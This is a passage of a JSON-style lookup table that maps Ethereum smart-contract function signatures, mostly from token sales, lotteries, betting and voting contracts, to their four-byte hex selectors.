"AddressForReturn()": "0xbba4e4c0", "masterAuth()": "0xb4150f17", "neverdieToken()": "0xcfedc04a", "icoThreshold2()": "0x8c1c7acc", "baseTokensPerEther()": "0x728d5e94", "tenthousandths()": "0xdfc366e8", "fourweeks()": "0xd06798f2", "BONUS_500()": "0x10e04dcb", "totalWins()": "0x777ac349", "reserveCATDestination()": "0x3d73c2de", "totalJadeProduction()": "0x833331e8", "whitelistEndTime()": "0xebdfd722", "TIMESTAMP_BUCKET_SIZE()": "0x4b4e23e1", "getTotalTickets()": "0x06e8337f", "firstReserveWallet()": "0xaede4680", "numberOfRecordEntries()": "0x908ccc5e", "maxTokensToBuy()": "0x9cfa0f7c", "maxBlockDrift()": "0xba81522f", "bountyReserveTokensDistributed()": "0x893c1d31", "TEAM_VESTING_AMOUNT()": "0x17cdb812", "promotionsUsed()": "0x25a2219f", "numTokensInLottery()": "0x6bb72c97", "teamvalue()": "0xddf29872", "pointsLimit()": "0x37a31079", "defaultBuyerLastPaidAt()": "0x6ea96bcd", "tradeDealConfirmed()": "0x9291b1f3", "DCNForGas()": "0xb42b14c4", "blockMinedAt()": "0x72a984b2", "PRICE_MID()": "0x5487e055", "SALE0_RATE()": "0x51a28572", "startTimeSale2()": "0x99a79790", "KYC_ETH_LMT()": "0x9c70b899", "activeTime()": "0xcb8c478a", "crownTotalSupply()": "0x806b39ab", "GraceFund()": "0x046c82e4", "LOCKED_2Y_DATE()": "0x978c5b15", "MAX_ALLOCATIONS_COUNT()": "0x287bd206", "minDai()": "0x5cf28fa4", "cryptoRomeWallet()": "0x37efa397", "minimumPledgeAmount()": "0xdecf1e64", "shareContract()": "0xd1f55764", "claimDate()": "0x0db4bad0", "earlyInvestors()": "0x73f3bd1f", "isFreezeEnabled()": "0x558305f9", "BONUS_TIER_2_LIMIT()": "0x329f36b5", "availableTokensforPreICO()": "0x114beab3", "minDepositInCents()": "0x7488ad7c", "convertTokens()": "0x8c8e2478", "affiliatePercentage()": "0x91a57544", "fundBountyAndTeam()": "0x449d1ba4", "rinkeby()": "0xb98cb57e", "highFunding()": "0x33905d41", "edoToken_()": "0x63a3d383", "totalRedeemedCheque()": "0x9f351fc0", "newRubesUntilPayout()": "0xf4c7f92c", "feePerc()": "0xef41ea7e", "SALE_2WEEK_BONUS()": "0xe60b2c9a", "crowdsourcers()": "0x66e20b51", "TOKEN_SWAP_DURATION_HOURS()": "0xf531dbbf", "preSale5Finished()": "0xeb44dd5d", "getBooleanValue(bytes32)": "0x17e7dd22", "delAddressValue(bytes32)": "0xfcf911e7", "setAddressValue(bytes32,address)": "0x5a2bf25a", "getAddressValue(bytes32)": "0x4c77e5ba", "divUIntValue(bytes32,uint256)": "0xad1c582a", "mulUIntValue(bytes32,uint256)": "0xf9bfc71b", "subUIntValue(bytes32,uint256)": "0x6aebbbd9", "addUIntValue(bytes32,uint256)": "0xc8d1c017", "delUIntValue(bytes32)": "0xb904ef4a", "setUIntValue(bytes32,uint256)": "0x3562fd20", "getUIntValue(bytes32)": "0xbdc963d8", "validContracts(address[])": "0x9070e8a5", "addAllowedContracts(address[])": "0xfa40ce34", "setAllowedContract(address[])": "0xb7ab7ade", "getAllowedContractsCount()": "0xdaa86216", "create(bytes32)": "0x7368a8ce", "authenticate()": "0x380c7a67", "exists(address,address)": "0x7663f822", "iii()": "0xe8ebf3c5", "createDifficultyOracle(uint256)": "0x9d5f2422", "isConditionMet()": "0xf4bd0bcf", "strToUnderlierType(bytes32)": "0x5ff19392", "strToOperator(bytes32)": "0xee00362f", "recall()": "0xd4270d60", "trigger()": "0x7fec8d38", "validate()": "0x6901f668", "makeUnderlier(bytes32,address,int256)": "0x24d16a4d", "addCondition(bytes32,bytes32,address,int256,bytes32,address,int256,bytes32)": "0x4280606b", "initialize(address,address,bytes32,address,int256,bytes32,address,int256,bytes32,uint256)": "0x31b57b46", "Instrument()": "0x54672768", "bop()": "0x0dff5cb9", "removeAddressFromWhitelist(address)": "0x286dd3f5", "addAddressToWhitelist(address)": "0x7b9417c8", "setMaxAddresses(uint256)": "0x10c70801", "checkWhitelisted(address)": "0x20d8dad0", "getWhitelists()": "0xc35dcf90", "Whitelist(address[],uint256)": "0xb4fe3017", "testTransferFrom()": "0x70557298", "FooToken()": "0x72121dac", "getProjectCreator(uint256)": "0x5a36e0da", "getProjectDescription(uint256)": "0x845ab425", "getProjectJudge(uint256)": "0xcd8b0a77", "getProjectVerification(uint256)": "0x7c47ac44", "getNumBadBets(uint256)": "0xe0862fd7", "getNumNiceBets(uint256)": "0x6e1cf038", "getProjectEndDate(uint256)": "0x690a946b", "getProjectName(uint256)": "0xf1fa906c", "getNumProjects()": "0x16ff5b87", "getBadBets(uint256)": "0xb4da40f3", "getNiceBets(uint256)": "0x6469c89b", "bid(uint256,bool)": "0xb9468f7e", "createProject2()": "0x59ac5b32", "Betfunding()": "0x0b70ce55", "print(int256,address)": "0x9c253011", "PrintableToken(string,uint256,string,uint256,int256)": "0x02aec20d", "query(bytes32,bytes2,int256)": "0xd76d6ee0", "exists(bytes32,bytes32)": "0x8683612b", "insert(bytes32,bytes32,int256)": "0x870e5405", "getNextNode(bytes32)": "0xaf82403c", "getPreviousNode(bytes32)": "0x419308f7", "getNodeRightChild(bytes32)": "0x84987faa", "getNodeLeftChild(bytes32)": "0x190a8613", "getNodeParent(bytes32)": "0x9a04fc8b", "getNodeHeight(bytes32)": "0xbdf7716d", "getNodeValue(bytes32)": "0x82ac1d99", "getNodeIndexId(bytes32)": "0xada5ba01", "getIndexRoot(bytes32)": "0xce7cdbb7", "computeNodeId(bytes32,bytes32)": "0x00603126", "computeIndexId(address,bytes32)": "0x103b5dad", "iMaliToken(address)": "0x82594f09", "transferExternalValue(bytes32[])": "0x3f883dfb", "transfer(bytes32[])": "0x90a2005b", "withdraw(uint256,address)": "0x00f714ce", "setUrl(bytes32)": "0x20ee0c94", "setOrganiser(address)": "0x8c4b0e7e", "payOrganizer()": "0xe6f67ef2", "Forge()": "0x6c062cc7", "OriginalAddress(address,address)": "0x38e11779", "Amount(uint256)": "0xee0e21a0", "SetBeneficiary(string,string,string,string,string,string,string,string,string,string,address,string)": "0xdd859739", "SetOriginator(string,string,string,string,string,string,string,string,string,address,string)": "0x4f3d1416", "locationOf(bytes,uint256)": "0x43c5d889", "addressAt(address,bytes,uint256)": "0x14deb0ac", "uint256At(uint256,bytes,uint256)": "0x7db8782a", "invokeContracts(bytes)": "0xc9f88f27", "execute(address[],bytes)": "0x3bf30f85", "testBurningUndistributed()": "0x95fbfa0d", "testLimiting()": "0x1a2c752a", "testSimpleBurning()": "0x3b1a520d", "SixtyPercentRules(address)": "0xcd31f391", "setNumVotesRequired(uint256)": "0x9a443955", "setLabel(string)": "0xbf530969", "castVote()": "0x0fb524ce", "inc()": "0x371303c0", "Counter()": "0x4eeca076", "getMesa(uint256,uint256,uint256)": "0xa85e07e2", "getEscuela(uint256,uint256)": "0xdedc440f", "getDistrito(uint256)": "0x192ecd68", "setFiscal(bytes32,bytes32,bytes32,uint256,uint256,uint256)": "0x1cd60a85", "setFiscalVerify(bytes32,bytes32,bytes32,uint256,uint256,uint256)": "0x9e3809a9", "Credit(address,address)": "0x5fa67c00", "Debit(address,address)": "0x24aff74d", "UserPool(address,address)": "0xc2d83e61", "Balance(address,address)": "0xd416d4f3", "MyPoolBalance()": "0xd503d33f", "MyActive()": "0x3e5a2024", "MyReferrer()": "0x47b989af", "FromQueue(address,address)": "0x31c89d3e", "IntoQueue(address,address)": "0xf94b97c9", "IsSetReferrer()": "0x663a339d", "IsActiveUser(address,address)": "0xa433d5c6", "ReferralReward(uint256)": "0xe428ad8a", "UserUpdate(address,address)": "0x67682441", "In(uint256)": "0xa6ce25b2", "GetData(uint256)": "0xc660477b", "DaysToDestroy()": "0xe26422fe", "MyRefReward()": "0x7110ce25", "MyReferrals()": "0x9bedb2c7", "MyContribution()": "0xd80a5c3b", "MyBalance()": "0x7a8e832f", "SetReferrer(address,address)": "0x137b763d", "TakeOut(uint256)": "0x1c9193c0", "ReInvest(uint256)": "0x268ea7f6", "gago()": "0xc9912255", "addEsgoTX(address,uint256,uint256,uint256,uint256)": "0xdfdfb261", "getAPRTx(uint256)": "0x1e17f292", "getEsgoTXFund(uint256)": "0x900cff49", "getEsgoTX(uint256)": "0x1f66531d", "getUserTX(address,uint256)": "0x2c19fbbb", "getDisputeTX(uint256)": "0xe491936f", "tearDown(uint256)": "0xdc69a2d6", "autoTearDownAndDestruct()": "0x2c6c1108", "autoDestruct()": "0x6ffe67f2", "testCallBack(uint256)": "0xb4e0aa3e", "fulFillTX(uint256)": "0x135e9ad6", "disputeTX(uint256)": "0x52e34245", "getUserTXCount()": "0xe5a85478", "getEsgoTXCount()": "0x04362c2d", "addFullFundTX(uint256,uint256)": "0x0ab6ff19", "getFundAllTx(uint256)": "0xe6e261b2", "addFundTX(uint256,uint256)": "0x8b02c8b2", "getTearAward(address,uint256,uint256)": "0x98672215", "getUserTearAward(address,uint256,uint256)": "0x53bfd3d0", "getAwardCost(uint256)": "0x75504b6e", "getFundTX(address,uint256)": "0xe37b71ce", "addUsers(address)": "0x04343722", "getTearBalance()": "0x2dd306f7", "Purchase(address,uint256)": "0x2499a533", "createBondFundToken(string,string,uint256,int256,uint256,uint256,address,string,uint256)": "0x065df077", "claimAllDividends(address)": "0x19aaff86", "unclaimedDividends(address)": "0x0490c71c", "calculateClaimByIndex(address,uint256)": "0xcb821f03", "claimDividendByIndex(address,uint256)": "0x53779c11", "depositDividend(uint256)": "0x13e2dfc1", "WorldNode()": "0xc7fc9ace", "Transfer(address,uint256)": "0x69ca02dd", "NewToken(address,string,string)": "0xc3d0a20a", "CarRegistry(string)": "0xe004fe97", "TOPToken(uint256,string,uint8,string)": "0xb4f272e3", "setVotingParams(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x8717ef27", "setFreelancerParams(uint256,uint256)": "0x5a6dad3c", "isJobHasFreelancer(bytes)": "0x19d45925", "isJobExpired(bytes)": "0x1af26fc2", "isJobCancel(address,bytes)": "0x29e81c79", "isJobStart(bytes)": "0xf0cb740a", "isOwnerOfJob(address,bytes)": "0x6da705f5", "setCompanyURI(string)": "0x133922ad", "multipleMint(address[],uint256[])": "0xf2dabd26", "multipleAddToWhitelist(address[])": "0x2368d215", "TokenTes()": "0x096437bc", "setUserInfo(address,uint256,uint256)": "0xf5c972ac", "TransferRate()": "0x92b7bfbb", "setTransferRate(uint256)": "0x3aefaeb8", "pay(address,uint256,bytes32)": "0x5e5571ac", "getRequiredSignatures()": "0xccd93998", "setRequiredSignatures(uint256)": "0x7d2b9cc0", "login(address)": "0x35a6861a", "tToken(address,uint256)": "0x1bfb7245", "upgradeCoinbase(address)": "0x08c3bf39", "AdvancedERC20(uint256,string,string)": "0x7cd64c79", "upgradeOwner(address)": "0xe609348a", "getAddressBetsForEvent(bytes32,address,string,string)": "0xcec9df89", "getScenariosInfo(bytes32,string,string)": "0x5c6e0ebf", "getEventInfo(bytes32)": "0xf765b6b1", "getScenarioNamesAndEventStatus(bytes32)": "0x5976ddd0", "doesEventExist(bytes32)": "0x86f2907a", "internalDoesEventExist(bytes32)": "0xce109195", "changeHouseFeeAddress(address)": "0xc07a1f0c", "changeHouseFeePercent(uint256)": "0x579d4f7a", "calculateWinnings(bytes32,address)": "0x65149a76", "claimRefund(bytes32)": "0x71de2ffc", "claimWinnings(bytes32)": "0xe49b606c", "cancelAndEndEvent(bytes32)": "0xf095ed3c", "setWinnerAndEndEvent(bytes32,bool,string)": "0xad388896", "updateBettingOpensTime(bytes32,uint256)": "0x2ff077be", "updateEventStartsTime(bytes32,uint256)": "0x30ea55a0", "placeBet(bytes32,string)": "0x25100b4d", "createNewEvent(bytes32,string,uint256,uint256,string,string)": "0xefa390f6", "GetExpireTime(uint256,uint256)": "0x8cb56999", "GetDayCount(uint256)": "0xeab07d42", "pullShares(address)": "0xfb6d0e8f", "getLastKicker()": "0x35cd4cc4", "getCurrentValue()": "0x0f76c114", "hasWinner()": "0x9755a710", "checkShares(address)": "0x8d5ceeca", "withdrawShares()": "0x8d086da4", "kickTheCoin()": "0x77e7ff41", "KickTheCoin()": "0xfa208cc5", "RGHTC()": "0x3217e44e", "BACKLEAF()": "0xd1e99563", "GameXChange()": "0xb0e757c5", "WineChainToken()": "0x19c0737f", "Lupecoin(address,address)": "0x121a496b", "NekoToken()": "0x56814312", "LAWCoin(uint256,string,string,address)": "0xf274d00c", "GTDCStandardToken(uint256,string,uint8,string)": "0x93399949", "REKTtoken()": "0x702056de", "dis()": "0x224dc278", "MobileApp()": "0xba84cb3f", "Eladporat()": "0x8b9596ed", "TheExcelToken()": "0x03c6c8f9", "TFOA(uint256,string,string)": "0xbd28d688", "internalMint(address,uint256)": "0x35001a1a", "mint(address,bytes32,bytes32,bytes32[],bytes)": "0xee5301d5", "setTokenURIPrefix(string)": "0x99e0dd7c", "initializeOwnable(address)": "0xc9a6964a", "bytes32IsEmpty(bytes32)": "0x4d4282e9", "uint2bytes(uint256)": "0x345a8e5b", "modifyMetadataHashes(uint256,bytes32,bytes32,bytes32[],bytes)": "0x34c05ca8", "internalSafeTransferFrom(address,address,uint256,bytes)": "0x8132e223", "internalTransferFrom(address,address,uint256)": "0x935cac39", "beneficiariesPercentage(address[],uint256[])": "0x2e368e03", "getTierForLastMiniting()": "0x8faef6a5", "tokensToMint()": "0xcbafee8a", "VUO()": "0xe090ebab", "getUndistributedBalanceOf_(address,uint256)": "0x283b5f95", "getLockedTokens_(address)": "0x2fddf859", "getLockedTokensInGroup_(address,uint256)": "0xca6d5d0c", "setGlobalLock(bool)": "0x319a9395", "resetGroupInfo(uint256)": "0x315ad5ce", "relockGroup(uint256)": "0xf9dfea54", "changeGroupInfo(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xe4bf6195", "distributeCallback(uint256,uint256)": "0xdbd2ac60", "instructOracleToDistribute(uint256)": "0x3ebb2d6b", "getHowMuchUntilHardCap_(uint256)": "0x4f7eb571", "createGroup(string,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x7fd169d6", "setAllowedToBuyBack(bool)": "0x8c2a5938", "signalDoneDistributing(uint256)": "0x0d4891ad", "refund(address[],uint256[])": "0xc091c435", "callbackInsertApproveAndDistribute(uint256,address[],uint256[])": "0xfed8a53b", "insertAndApprove(uint256,address[],uint256[])": "0x81edc308", "purchaseCallbackOnAccept(uint256,address[],uint256[])": "0x215b5411", "removeOracleAddress()": "0xd98b43f7", "BitcoinBlue()": "0x1d598d10", "ThreeStarToken()": "0x5e0055e7", "Tutancoin()": "0x532ff568", "YangMaoZhuangYuan(uint256,string,uint8,string)": "0xba827243", "getset()": "0xd2e91b85", "setmyPrice(uint256,uint256)": "0x0ea733bf", "LajokiCoin()": "0x9d139ff2", "HVB()": "0x145e8f5e", "createNewSubtoken(uint256,address,uint256)": "0x090e871f", "approve(uint256,address,uint256)": "0x8cb0a511", "transferFrom(uint256,address,address,uint256)": "0x1c0f12b6", "transfer(uint256,address,uint256)": "0xf8548e36", "allowance(uint256,address,address)": "0x0d550b75", "balanceOf(uint256,address)": "0x3656eec2", "totalSupply(uint256)": "0xbd85b039", "toggleDead()": "0x5acb053b", "sendFundHomeAmt(uint256)": "0x67e0d78f", "setHaltIco(bool)": "0x02c95d2d", "getcan(address)": "0x9bde88f0", "BTYCT(uint256,string,string)": "0x5628d443", "Bigba()": "0xf67a81ea", "FireXToken()": "0x0d9b2730", "SocialRemitToken(uint256,string,uint8,string)": "0x9e325b80", "getLotteryBalance()": "0x60654e47", "getTicketsLeft()": "0x646f22c5", "getRound()": "0x9f8743f7", "getMaxTickets()": "0x62c95aa1", "getPreviousWinner()": "0x288714be", "getPlayerLength()": "0x7c645c21", "getPreviousHashUint()": "0x805c3abd", "getPreviousSeed()": "0xc7ee1c4e", "notSameSeed(string,string)": "0xc7143c41", "calculateHash()": "0x40086158", "joinLottery()": "0x6c77f989", "Cryptodraw()": "0x0d9029ea", "Option(string,string,uint8,uint256,address)": "0x9590ef13", "sfc(uint256,string,string)": "0x483d31e9", "LEK(string,string,uint256,uint8)": "0x1acd8237", "VPTToken()": "0x29e6b5be", "BICToken(uint256,string,string)": "0xb8e9ac71", "QuadToken()": "0xafca35e5", "restrictTokenTransfer(address)": "0x12b0d309", "allowTokenTransfer(address)": "0x92898900", "hodl()": "0x60f14509", "Shopdex()": "0xb60b9ff7", "changeWhitelist(address,address)": "0xb215f30c", "initializeWhitelist(address)": "0xa17d5f44", "presale_start_block()": "0xcba9c0e0", "isAdminOwnersValid()": "0x4953b57d", "maximumValueAfterGuaranteedPeriod()": "0x0111ae8a", "maxIcoDuration()": "0x31787b91", "RANGEEND_10()": "0xac3cdf78", "_price_tokn_PRE()": "0x274db4d6", "adventureItem()": "0x7138364b", "ROUND_2_PRESALE_BONUS()": "0xef05bf0e", "deathData_v0()": "0xfd0f267b", "peculAdress()": "0x00137d6e", "jcrUsdRate()": "0x2be86e01", "debugVal()": "0xdf7ae3d8", "stage2Bonus()": "0xdc322802", "allowSelling()": "0x385ab2d7", "StartPaymens()": "0x1fc0e5e9", "icoEndTimestampStage2()": "0x62fec51b", "fibonacciIndex()": "0x0ad4b97b", "STATE_NOT_FINISHED()": "0x621a61ac", "TEAMS_TOTAL()": "0x5fe36964", "approveNewOwner()": "0xc81bd106", "icoRound5()": "0x2e2cce55", "minStartDelay()": "0x58623642", "preIcoTarget()": "0xdd397e03", "objectSack()": "0x50b82a48", "endPreICO()": "0x77f3293a", "numDrops()": "0x8bc30096", "stuff()": "0x9c755f2f", "AffiliateCoinMultiSigWallet()": "0xf80db825", "personalMax()": "0x0be48491", "MarketingAddr()": "0xf767fe97", "ICO_RATE2()": "0x86b2be73", "bounties()": "0xe1be7467", "totalSupplyUpgraded()": "0xfa96a49e", "getMax(uint256[])": "0xca1314af", "tgrSettingsPartFounders()": "0x24b51369", "reTweetReward()": "0x492dda05", "pauseMode()": "0x229b04bf", "maxBountyTokens()": "0xab71b8ac", "cache()": "0x60c7d295", "postFreezeDestination()": "0x57c19b4f", "givenBountyTokens()": "0xef90aa46", "MINT_LOCK_DURATION_IN_WEEKS()": "0x524dcda3", "returnPtSafeMedium()": "0xf6cdf281", "transferFees()": "0xc2fbe7bc", "bankMoney()": "0xb81e3b19", "AddrCommunityDistribute()": "0xe5f6a908", "CollectibleIndex0()": "0x60cb96be", "transferableStartTime()": "0xf6f5eb59", "currentBonusPercent()": "0xaf02d47b", "VILLAGE_START_PRICE()": "0x4a98146a", "SoldNoBonuses()": "0xee75caa9", "numMCApplied()": "0xe0f426fa", "toDec()": "0x8c9ecd00", "inviteReward()": "0x011847a2", "TEAM_POOL_INIT()": "0xf12b60f2", "isLastRaceFinsihed()": "0xc0dcf63a", "minimumStageDuration()": "0x15969c4e", "totalTokensToSend()": "0x2902320a", "VESTED_AMOUNT()": "0xb85926e0", "demicals()": "0x61ed2094", "getResourceSetCount()": "0x2a61d47b", "san()": "0xd49636c2", "vestingStarts()": "0x328b10d7", "bonusTokenVault()": "0xa00b043e", "How_to_interact_with_Smartcontract()": "0xf11c46f4", "reservedWallet()": "0xc22ab4e0", "totalSupplyBonus()": "0x153aa771", "command()": "0x9297c24c", "team2018TokenCreated()": "0x7e6beae1", "countVotes()": "0xb647990a", "teamTotal()": "0x075bf772", "phasePublicSale1_To()": "0x5e431a6f", "developerAddress()": "0xcaccd7f7", "DATE_31_DEC_2019()": "0x154a7d71", "minimumFundingCHF()": "0xf34969d1", "stage2Deadline()": "0xabbe3056", "lastBlock_f19()": "0x0bcbe35b", "lockReleaseDate()": "0xac4abae1", "withdrawFoundationFunds()": "0x61bf7692", "foundationWallet()": "0x6b7ae8dc", "getBuyUnitsInformations()": "0xc7df9054", "preSaleBonus3Amount()": "0xbe79ca77", "advisors()": "0xedcfd050", "etherForOwner()": "0x5a5e0074", "teamKeepingPercentage()": "0x962318b8", "saleToken()": "0xe985e367", "tokensSpent()": "0xe3dbaff1", "ROLE_TOKEN_CREATOR()": "0x8d4e57e6", "maxGIRL()": "0x67955ffa", "lockDays()": "0x6e6ff8a9", "enteredTotalAmount()": "0x6cde71ee", "utilityLockedDate()": "0xa21d5b9f", "JBXPERETH()": "0x3d412396", "MAT_TOTAL_SUPPLY_LIMIT()": "0xf28b824e", "MAKERDAO_FEED_MULTIPLIER()": "0x4a6213a1", "bountySent()": "0x90c32295", "PRESALE_BALANCES()": "0x2b0e16bf", "pricingStrategyAddress()": "0xe18dc0f6", "stageMaxBonusPercentage()": "0x35e0f450", "APPC()": "0x9a9d6515", "personalizeSquare(uint256,bytes,string,string)": "0x76f14c98", "SuNFT()": "0x346c95df", "_transfer(uint256,address)": "0x1942c3ce", "PublishInterfaces()": "0x5d3aac49", "setOperatingOfficer(address)": "0x2aad292e", "setFinancialOfficer(address)": "0xd978a0d3", "setExecutiveOfficer(address)": "0xec13df6b", "ADZbuzzCommunityToken()": "0xcfaaff4c", "diffString(string,string)": "0xa62533e6", "_payout(address)": "0xe4f8b908", "_createTeam(string,address,uint256)": "0x9f337cce", "getTeam4name(string)": "0xb5e71687", "getTeam(uint256)": "0x008e0f1b", "getTeamId(string)": "0xfe3c51df", "WorldCupToken()": "0xc9351571", "setStart()": "0x35975a37", "setStop()": "0x92cf1d49", "refundTokens(address,address,uint256)": "0x89519c50", "unfreezeTransfers()": "0x31c420d4", "freezeTransfers()": "0x01502460", "createTokens(uint256)": "0x7e1f2bb8", "THORToken()": "0x9e8836e2", "AbstractToken()": "0x8c363fda", "breakIt()": "0x6a1f9e19", "ballotLog(address,uint256)": "0x0d5be2df", "ballotLog(bytes32[2])": "0xfab93805", "OwnerAddition(address)": "0xf39e6e1e", "gumXZCZ()": "0x0000000c", "toUint(bytes,bytes,uint256)": "0x6c341889", "toAddress(bytes,bytes,uint256)": "0xc54b5658", "slice(bytes,bytes,uint256,uint256)": "0x5d204869", "toBase32(bytes)": "0xa30ef9e7", "Local()": "0xdee81a13", "createEIP20(uint256,string,uint8,string)": "0x1e5f3569", "verifyEIP20(address)": "0xcd4d6895", "EIP20Factory()": "0x855c45e7", "normalFunc()": "0x22f7d1f8", "lola()": "0x9e0c0152", "baba()": "0xfa030ef1", "bax()": "0xcdbd3fc9", "blah()": "0xe39dcc21", "tag()": "0x51f91066", "foobar()": "0x05df75db", "abstain()": "0x5e98e4c7", "getMyTuple()": "0x1c5f8675", "alloc()": "0xbbc001c3", "returnNumber(uint256)": "0x9ea67876", "_premiumPricePer30Days()": "0x1e31264d", "setWeiPerCent(uint256)": "0xca37a9eb", "setMinorEditsAddr(address)": "0x383bb22a", "_modAccountBalance(bytes32,uint256)": "0x5c35f464", "getPaymentLog(uint256)": "0xf8ef9a3d", "getPaymentLogN()": "0x6cc03315", "getMinWeiForDInit()": "0x56e52cbb", "getUsdEthExchangeRate()": "0xddd9537d", "getWeiPerCent()": "0x8185b8e9", "getPremiumCentsPricePer30Days()": "0xe8e9eeae", "getPremiumMultiplier()": "0x761ba894", "getBasicBallotsPer30Days()": "0x5429a417", "getBasicExtraBallotFeeWei()": "0xb2148d38", "getBasicCentsPricePer30Days()": "0xe839554e", "setMinWeiForDInit(uint256)": "0xf3199e98", "setDenyPremium(bytes32,bool)": "0x32c0c583", "setFreeExtension(bytes32,bool)": "0xb352867c", "setPremiumMultiplier(uint8)": "0xe2e794c3", "setBasicBallotsPer30Days(uint256)": "0xa05e3bb0", "setBasicCentsPricePer30Days(uint256)": "0x0bf63c60", "giveTimeToDemoc(bytes32,uint256,bytes32)": "0x04318794", "getDenyPremium(bytes32)": "0x12f11ed3", "getAccount(bytes32)": "0xd1de5011", "getFreeExtension(bytes32)": "0x672350bd", "getPremiumStatus(bytes32)": "0x72004a65", "getSecondsRemaining(bytes32)": "0xee882a99", "accountInGoodStanding(bytes32)": "0x33af060f", "upgradeToPremium(bytes32)": "0xbb48d190", "downgradeToBasic(bytes32)": "0x3e06be20", "doFreeExtension(bytes32)": "0xff2b0571", "payForDemocracy(bytes32)": "0x00a219f4", "centsToWei(uint256)": "0x1c732d83", "weiBuysHowManySeconds(uint256)": "0xf3b8b2a9", "emergencySetOwner(address)": "0x158ee887", "subToZero(uint256,uint256)": "0x2915fd3d", "sendTo(address,bytes,uint256)": "0x759343d4", "reentrancyHelper(address,bytes,uint256)": "0xab14a41f", "storeDataAndValue(bytes)": "0x091ba3da", "storeData(bytes)": "0xac5c8535", "willThrow()": "0x18955b1e", "revokePastDelegations()": "0x5bcc437c", "addRecord(bytes32,bytes32,bool)": "0xbdcd0262", "lookupAllSince(uint256)": "0xade2f939", "nEdits()": "0xde5bb5a2", "setStartTime(uint256,uint64)": "0xabf567e1", "setSB(uint256,uint16)": "0x31bf0b42", "pack(uint16,uint64,uint64)": "0xe2fa5398", "unpackAll(uint256)": "0xcacfb535", "packedToEndTime(uint256)": "0x664abc0f", "packedToStartTime(uint256)": "0xfef64e37", "packedToSubmissionBits(uint256)": "0x1b981d7f", "_dlgtRet(uint64)": "0xac828200", "_getIdIfValid(bytes32,uint256)": "0x88ee4b2d", "transferERC23(address,uint256,bytes)": "0x685c60de", "ERC23TokenMock(address,uint256)": "0x904adc3d", "testReentracy()": "0xd86491fc", "TestFund()": "0xf0685bf0", "testAddUser(address,uint256)": "0x61bfe61b", "withdrawGas()": "0x1261795d", "sendToIco()": "0x103359ce", "setBuyTime(uint256)": "0xe180819e", "startBuyTime()": "0xaa682682", "StandardTokenMock(address,uint256)": "0xdbf53a0e", "removeAdministrator(address)": "0x68fa8134", "addAdministrator(address)": "0xc9991176", "getRentInfo()": "0xd506355c", "updateRentInfo(uint256,uint256,uint256)": "0xcbaf566d", "test_mint(int256)": "0x4f7baec0", "testFail_mint_without_add_authority_to_controller(int256)": "0x26c387fa", "test_interface_call()": "0x04f9d030", "testFail_interface_call()": "0xaf049ea9", "test_basic_sanity()": "0x6dae014c", "removeFreelancer(address,uint256[],address)": "0x3a48f8c1", "getFreelancers(address,uint256)": "0x8669ccf4", "addFreelancer(address,uint256[],address)": "0x1c0e7109", "getJobs(address,uint256)": "0x2af22e3b", "addJob(address,uint256,uint256)": "0xc405b1f0", "setDelegadoDeEscuela(bytes32,bytes32,uint256)": "0x3e867089", "setDelegadoDeEscuelaVerify(bytes32,bytes32,uint256)": "0x92be5d13", "setDelegadoDeDistrito(bytes32)": "0xdcfff171", "setDelegadoDeDistritoVerify(bytes32)": "0xffd48f40", "setVicepresidenteDeMesa(bytes32,uint256,uint256,bytes32)": "0x956b76f7", "setPresidenteDeMesa(bytes32,uint256,uint256,bytes32)": "0x8036b5db", "setPresidenteDeMesaVerify(bytes32,uint256,uint256,bytes32)": "0x91aa94f1", "setFiscal(uint256,uint256,bytes32)": "0x47146b28", "setFiscalVerify(uint256,uint256,bytes32)": "0x5bef95a2", "getMesa(uint256,uint256)": "0x8a1f7a1b", "getEscuelas()": "0x22dce86c", "existsEscuela(uint256)": "0x979e8852", "getEscuela(uint256)": "0x96637b10", "createEscuela(uint256,address)": "0xba4feabd", "sellToken(address,uint256,uint256,bool)": "0x51babf0c", "buyToken(address,uint256,uint256,bool)": "0x0d2be064", "FloatGameToken(bytes32,address)": "0xdd3f8608", "lookup(bytes32)": "0xf39ec1f7", "GSMulti(uint256,uint256)": "0xd7ad28ec", "DacToken()": "0xb0dc1666", "testSellTwoTokens()": "0x1aa05ab6", "testThrowTranferFromEmptyBalance()": "0x88776a7e", "testThrowTranferZeroTokens()": "0x662512f1", "testThrowTranferTooManyTokens()": "0x1f720e71", "testTranferOneToken()": "0x03ab614d", "testDifferentTokenPrice()": "0x04dcad85", "testThrowNoPartialTokens()": "0x190a867e", "testThrowNoFreeTokens()": "0x26f09042", "testBuyTwoTokens()": "0x9e4ba1be", "testInitialEtherBalanceShouldBeZero()": "0xf896680c", "testInitialTokenBalanceShouldBeZero()": "0x558790d8", "testStoresUser()": "0x16e3cfc7", "testStoresParentChallenge()": "0x57cc2d52", "testStoresChallengeOwner()": "0xf00c9e67", "createAccount()": "0x9dca362f", "DaoChallenge(address)": "0x97d02e00", "sweep(address,uint256,uint8[],bytes32[],bytes32[])": "0x36169d90", "deleteContract(uint8[],bytes32[],bytes32[])": "0x6be47618", "StorageToken(address,address,address[],uint256,string,string,uint8)": "0xb10d6060", "isNameEmpty()": "0x53f25ca6", "stringandbytes(bytes)": "0x5a212e99", "submitProof(bytes32,bytes32,uint256[],bytes,uint256)": "0x886bbe0c", "resolved(bytes32,bytes32,uint256)": "0xfa57e2ab", "clock(bytes32)": "0x4380ab6d", "test3()": "0x0a8e8e01", "test2(bytes,uint256)": "0xa310f36a", "dataMerkle(uint256[],uint256,uint256)": "0x2f0cca79", "process2(bytes32,uint256[],bytes)": "0xc4baa573", "slice2(bytes,uint256,uint256)": "0xf195f0f9", "process(bytes32,bytes[])": "0x5b09a518", "bytes32ToBytes(bytes32,bytes32)": "0xdd7b3f26", "shaCommit(uint256)": "0x8a8e5afb", "setClaimBlocks(uint256,uint256)": "0xec620eb3", "isCustodian(address)": "0x35c80c8c", "getCustodianName(address)": "0xb168da8a", "setCustodianName(address,bytes32)": "0x403988c6", "CustodianRegistry(address)": "0x2974a822", "RestrictedShares(string,string,uint256,uint256)": "0xf57d76d5", "IouRootsReservationToken(string,string,uint8)": "0x14162e8d", "BAToken(address,address,uint256,uint256)": "0x3cfa92de", "killMe()": "0xb603cd80", "PresaleBREMP(address,uint256)": "0xed785e29", "Token(address,uint256)": "0xc5944f30", "finishCrowdsale()": "0xb80cdcf6", "startBonuses()": "0x69d29832", "startPresale(address)": "0xab7ebbce", "setEtherPrice(uint256)": "0x27187991", "Crowdsale(address,uint256)": 